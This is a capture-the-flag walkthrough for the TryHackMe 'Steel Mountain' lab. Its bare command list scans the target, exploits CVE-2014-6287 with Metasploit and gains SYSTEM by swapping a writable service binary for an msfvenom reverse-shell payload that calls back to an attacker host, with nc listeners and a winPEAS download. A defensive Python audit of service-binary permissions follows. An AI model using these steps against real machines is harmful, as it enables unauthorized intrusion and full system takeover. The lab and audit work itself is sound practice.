TryHackMe: Steel Mountain

  1. Deploy the machine. Who is the employee of the month?
nmap -Pn <ip>
nmap -sV -O <ip>
nmap --script vuln <ip>
port 80 -> http-vuln-cve2015-1635
port 8080 -> http-vuln-cve2011-3192
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>
msfconsole
search 2014-6287
use 0
show options
set RHOSTS <target ip>
set RPORT 8080
run
cd /Users
ls
cd bill
ls
cd Desktop
ls
cat user.txt
  1. Upload Script
upload <path>
load powershell
powershell_shell
. .\Powerup.ps1
Invoke-Allchecks
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -e x86/shikata_ga_nai -f exe -o ASCService.exe
use multi/handler
set LHOST <attacker ip>
set LPORT <attacker port>
sessions 3
upload /root/Desktop/ASCService.exe
shell
sc stop AdvancedSystemCareService9
copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
sc start AdvancedSystemCareService9
migrate 648
getsystem
cd /Users/Administrator/Desktop
ls
cat root.txt
  1. Save script from
python -m SimpleHTTPServer 80
nc -lvp 4444
python <ip> 8080
mv ncat.exe nc.exe
python <ip> 8080
powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://<attacker ip>/winPEAS.exe"
AdvancedSystemCareService9
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
powershell -c "Get-Service"
cd \Program Files (x86)\IObit\Advanced SystemCare
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=1234 -f exe -o ASCService.exe
nc -lvp 1234
sc stop AdvancedSystemCareService9
rename ASCService.exe ASCService_bak.exe
powershell -c "Invoke-WebRequest -OutFile ASCService.exe"
sc start AdvancedSystemCareService9
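
Both routes above end the same way: a non-administrative user overwrites ASCService.exe and restarts the service. The following is an added example, not part of the original writeup, showing how a defender can audit for that condition by parsing `icacls` output for a service binary and flagging write-capable ACEs held by untrusted principals. The trusted-principal list and the sample `icacls` output (including the `HOST\bill` entry) are constructed assumptions, not captured from the lab machine.

```python
import re

# Principals expected to hold write access (assumption; adjust per environment).
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
           "NT SERVICE\\TrustedInstaller"}
# icacls rights letters that let the holder modify, delete or re-ACL the file.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "D", "DE", "WDAC", "WO", "GA", "GW"}
# Flags that describe inheritance, not access.
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}

def writable_aces(path, icacls_output):
    """Return [(principal, [write rights])] for principals outside TRUSTED."""
    findings = []
    for line in icacls_output.splitlines():
        line = line.strip()
        if line.startswith(path):          # first line is prefixed with the path
            line = line[len(path):].strip()
        if not line or line.startswith("Successfully processed"):
            continue
        who, sep, flags = line.partition(":")
        groups = re.findall(r"\(([^)]*)\)", flags)
        if not sep or not groups:
            continue
        # Deny ACEs and inherit-only ACEs grant nothing on this object.
        if "DENY" in groups or "IO" in groups:
            continue
        rights = {r.strip() for g in groups for r in g.split(",")} - INHERIT_FLAGS
        hits = sorted(rights & WRITE_RIGHTS)
        if hits and who not in TRUSTED:
            findings.append((who, hits))
    return findings

PATH = r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
# Constructed sample output, not captured from the lab machine.
SAMPLE = PATH + r""" HOST\bill:(I)(RX,W)
    NT AUTHORITY\SYSTEM:(I)(F)
    BUILTIN\Administrators:(I)(F)
    BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for who, rights in writable_aces(PATH, SAMPLE):
        print(f"{PATH}: {who} has {','.join(rights)}")
```

Run the same check against the service's install directory as well, since write access to the folder also allows the binary to be swapped.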
